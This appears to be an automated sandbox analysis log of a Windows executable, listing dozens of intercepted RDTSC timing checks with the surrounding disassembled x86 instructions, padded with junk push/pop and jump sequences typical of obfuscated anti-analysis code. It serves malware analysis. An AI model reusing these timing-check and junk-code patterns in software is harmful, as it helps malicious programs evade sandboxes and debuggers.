Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E42 second address: 7540E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E53 second address: 7540E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E57 second address: 7540E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E5B second address: 7540E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E61 second address: 7540E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E67 second address: 7540E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E6B second address: 7540E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4464DAB8CDh 0x00000012 sbb si, 3146h 0x00000017 jmp 00007F4464DAB8D1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540E9E second address: 7540EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540EA3 second address: 7540EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540EA9 second address: 7540EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540EAD second address: 7540ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-08h] 0x0000000b pushad 0x0000000c mov si, 573Dh 0x00000010 popad 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4464DAB8D4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540ED6 second address: 7540EF2 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4464F4BF1Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540F79 second address: 7540F9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4464DAB8D2h 0x0000000c mov edx, esi 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 movsx edi, si 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540F9F second address: 7540FAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebx+70h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7540FAF second address: 754104E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ax, D6FFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 00000001h 0x0000000f pushad 0x00000010 mov ah, A6h 0x00000012 push edi 0x00000013 jmp 00007F4464DAB8D8h 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F4464DAB8D3h 0x00000022 xor al, FFFFFFDEh 0x00000025 jmp 00007F4464DAB8D9h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp], eax 0x0000002f jmp 00007F4464DAB8CEh 0x00000034 lea eax, dword ptr [ebp-18h] 0x00000037 jmp 00007F4464DAB8D0h 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F4464DAB8D7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754104E second address: 7541098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A35Ah 0x00000007 mov dx, 9B26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 jmp 00007F4464F4BF1Bh 0x0000001a popad 0x0000001b nop 0x0000001c pushad 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4464F4BF22h 0x00000024 xor cx, 37F8h 0x00000029 jmp 00007F4464F4BF1Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75410B4 second address: 7541112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4D88FC04h 0x00000008 call 00007F4464DAB8CDh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov edi, eax 0x00000013 pushad 0x00000014 movsx ebx, cx 0x00000017 push eax 0x00000018 mov ax, di 0x0000001b pop ebx 0x0000001c popad 0x0000001d test edi, edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4464DAB8D9h 0x00000028 or ax, BF56h 0x0000002d jmp 00007F4464DAB8D1h 0x00000032 popfd 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541112 second address: 7541130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F44D4EEA4ABh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4464F4BF1Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541130 second address: 754114F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 mov ah, A5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4464DAB8D0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754114F second address: 75411C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4464F4BF24h 0x00000012 adc cx, 0D68h 0x00000017 jmp 00007F4464F4BF1Bh 0x0000001c popfd 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 mov dword ptr [esi+0Ch], eax 0x00000024 jmp 00007F4464F4BF1Bh 0x00000029 mov edx, 775606ECh 0x0000002e jmp 00007F4464F4BF26h 0x00000033 sub eax, eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F4464F4BF1Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75411C4 second address: 75411FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4464DAB8CDh 0x0000000b add ecx, 730ED796h 0x00000011 jmp 00007F4464DAB8D1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75411FB second address: 7541203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541203 second address: 754124B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e jmp 00007F4464DAB8D3h 0x00000013 popad 0x00000014 test eax, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4464DAB8D5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754124B second address: 7541251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541251 second address: 7541255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541255 second address: 75412DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F44D4EEA395h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4464F4BF25h 0x00000015 adc ch, 00000016h 0x00000018 jmp 00007F4464F4BF21h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F4464F4BF20h 0x00000024 adc al, 00000038h 0x00000027 jmp 00007F4464F4BF1Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov edx, dword ptr [ebp+08h] 0x00000031 jmp 00007F4464F4BF26h 0x00000036 mov eax, dword ptr [esi] 0x00000038 pushad 0x00000039 movzx ecx, bx 0x0000003c mov dx, E3AEh 0x00000040 popad 0x00000041 mov dword ptr [edx], eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov dx, 3374h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75412DD second address: 754132F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+04h] 0x0000000d pushad 0x0000000e mov ax, FB09h 0x00000012 popad 0x00000013 mov dword ptr [edx+04h], eax 0x00000016 jmp 00007F4464DAB8D4h 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e jmp 00007F4464DAB8D0h 0x00000023 mov dword ptr [edx+08h], eax 0x00000026 pushad 0x00000027 mov ecx, 2A93825Dh 0x0000002c call 00007F4464DAB8CAh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754132F second address: 7541341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+0Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e movzx ecx, bx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541341 second address: 7541395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F4464DAB8D0h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F4464DAB8CDh 0x0000001d sub eax, 43D636B6h 0x00000023 jmp 00007F4464DAB8D1h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541395 second address: 754139B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754139B second address: 754139F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754139F second address: 75413DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F4464F4BF22h 0x00000017 or ecx, 6C8BCC38h 0x0000001d jmp 00007F4464F4BF1Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75413DF second address: 754144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F4464DAB8D2h 0x0000000e pushfd 0x0000000f jmp 00007F4464DAB8D2h 0x00000014 or ecx, 2C8470F8h 0x0000001a jmp 00007F4464DAB8CBh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+14h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4464DAB8D2h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754144B second address: 7541451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541451 second address: 7541455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541455 second address: 75414CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4464F4BF26h 0x00000016 or ch, FFFFFFE8h 0x00000019 jmp 00007F4464F4BF1Bh 0x0000001e popfd 0x0000001f mov si, FCDFh 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+18h] 0x00000028 pushad 0x00000029 mov ah, A8h 0x0000002b pushad 0x0000002c push edx 0x0000002d pop ecx 0x0000002e jmp 00007F4464F4BF1Fh 0x00000033 popad 0x00000034 popad 0x00000035 mov dword ptr [edx+18h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F4464F4BF25h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75414CD second address: 75414F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c pushad 0x0000000d jmp 00007F4464DAB8CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75414F6 second address: 75414FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75414FA second address: 7541547 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4464DAB8CEh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 4Bh 0x00000013 pushfd 0x00000014 jmp 00007F4464DAB8CFh 0x00000019 and ecx, 776094FEh 0x0000001f jmp 00007F4464DAB8D9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541547 second address: 75415DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464F4BF27h 0x00000009 xor cx, 270Eh 0x0000000e jmp 00007F4464F4BF29h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F4464F4BF20h 0x0000001a sbb ch, FFFFFF88h 0x0000001d jmp 00007F4464F4BF1Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [esi+20h] 0x00000029 jmp 00007F4464F4BF26h 0x0000002e mov dword ptr [edx+20h], eax 0x00000031 pushad 0x00000032 mov si, 013Dh 0x00000036 mov cx, 7439h 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+24h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F4464F4BF1Bh 0x00000045 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75415DA second address: 754160D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F4464DAB8CCh 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4464DAB8D7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754160D second address: 7541675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4464F4BF1Ch 0x00000013 xor cx, F238h 0x00000018 jmp 00007F4464F4BF1Bh 0x0000001d popfd 0x0000001e mov ch, 30h 0x00000020 popad 0x00000021 mov ecx, dword ptr [esi+2Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F4464F4BF1Ch 0x0000002c call 00007F4464F4BF22h 0x00000031 pop eax 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541675 second address: 75416D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464DAB8CEh 0x00000009 and esi, 0BEC96F8h 0x0000000f jmp 00007F4464DAB8CBh 0x00000014 popfd 0x00000015 mov si, 642Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+2Ch], ecx 0x0000001f jmp 00007F4464DAB8D2h 0x00000024 mov ax, word ptr [esi+30h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4464DAB8D7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75416D2 second address: 7541723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e jmp 00007F4464F4BF23h 0x00000013 popad 0x00000014 mov ax, word ptr [esi+32h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4464F4BF25h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541723 second address: 754174B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4464DAB8CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754174B second address: 7541751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541751 second address: 75417AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4464DAB8D4h 0x00000015 and ecx, 4E642C68h 0x0000001b jmp 00007F4464DAB8CBh 0x00000020 popfd 0x00000021 mov dx, cx 0x00000024 popad 0x00000025 mov dword ptr [edx+34h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4464DAB8D1h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75417AF second address: 75417F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, 00000700h 0x00000011 jmp 00007F4464F4BF25h 0x00000016 jne 00007F44D4EE9E58h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F4464F4BF1Ah 0x00000025 adc ah, 00000058h 0x00000028 jmp 00007F4464F4BF1Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75417F8 second address: 7541810 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4464DAB8CAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541810 second address: 7541816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541816 second address: 754181A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754181A second address: 754182B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754182B second address: 7541834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 84E7h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7541834 second address: 754183A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754183A second address: 754183E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754183E second address: 754186D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c jmp 00007F4464F4BF1Bh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4464F4BF25h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754186D second address: 754187D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4464DAB8CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 754187D second address: 75418B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e mov eax, ebx 0x00000010 pop edx 0x00000011 push ecx 0x00000012 call 00007F4464F4BF23h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 popad 0x0000001a leave 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75418B2 second address: 75418B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75418B6 second address: 75418BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590DDA second address: 7590DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590DDE second address: 7590DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590DF1 second address: 7590DF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590DF8 second address: 7590E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4464F4BF1Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590E0F second address: 7590E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4464DAB8D0h 0x00000013 rdtsc
